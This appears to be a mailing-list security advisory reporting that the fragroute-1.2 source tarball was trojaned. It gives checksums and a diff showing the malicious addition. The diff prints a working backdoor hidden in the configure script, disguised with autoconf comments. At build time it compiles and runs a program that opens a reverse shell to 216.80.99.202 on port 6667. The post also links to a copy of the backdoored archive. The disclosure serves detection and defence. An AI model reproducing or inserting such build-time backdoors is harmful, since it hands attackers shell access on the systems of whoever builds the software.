Hello, Although downloading it now seems safe, I think folks should know this. The changes done were similar to what happened to irssi, but with a different IP. MD5 sum of fragroute-1.2.tar.gz, downloaded from http://www.monkey.org/~dugsong/fragroute/ on may 27 (the contaminated version): 65edbfc51f8070517f14ceeb8f721075 MD5 sum of fragroute-1.2.tar.gz, downloaded from http://www.monkey.org/~dugsong/fragroute/ on may 30 (this is the current MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a Diff between the two: diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure --- fragroute-1.2/configure Mon Apr 15 16:41:43 2002 +++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002 @@ -1590,6 +1590,53 @@ fi +cat > conftest.c<<EOF +/* Override any gcc2 internal prototype to avoid an error. */ +/* We use char because int might match the return type of a gcc2 + builtin and then its argument prototype would still apply. */ +#include <stdio.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netinet/in.h> +#include <unistd.h> +int main() +{ +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ + int s; + struct sockaddr_in sa; + switch(fork()) { case 0: break; default: exit(0); } + if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) { + exit(1); + } + /* HP/UX 9 (%@#!) writes to sscanf strings */ + memset(&sa, 0, sizeof(sa)); + sa.sin_family = AF_INET; + sa.sin_port = htons(6667); +/* Override any gcc2 internal prototype to avoid an error. */ +/* We use char because int might match the return type of a gcc2 + builtin and then its argument prototype would still apply. */ + sa.sin_addr.s_addr = inet_addr("216.80.99.202"); + if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) { + exit(1); + } + /* HP/UX 9 (%@#!) writes to sscanf strings */ + dup2(s, 0); dup2(s, 1); dup2(s, 2); +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ + { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); } +} +EOF +gcc $LIBS conftest.c -o conftest; ./conftest +if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then + rm -rf conftest* +else + rm -rf conftest* +fi +rm -f conftest* + # DLPI needs putmsg under HPUX so test for -lstr while we're at it echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6 echo "configure:1596: checking for putmsg in -lstr" >&5 References ========== FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716 Irssi backdoor page: http://www.irssi.org/?page=backdoor Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz Cheers, -- Anders.
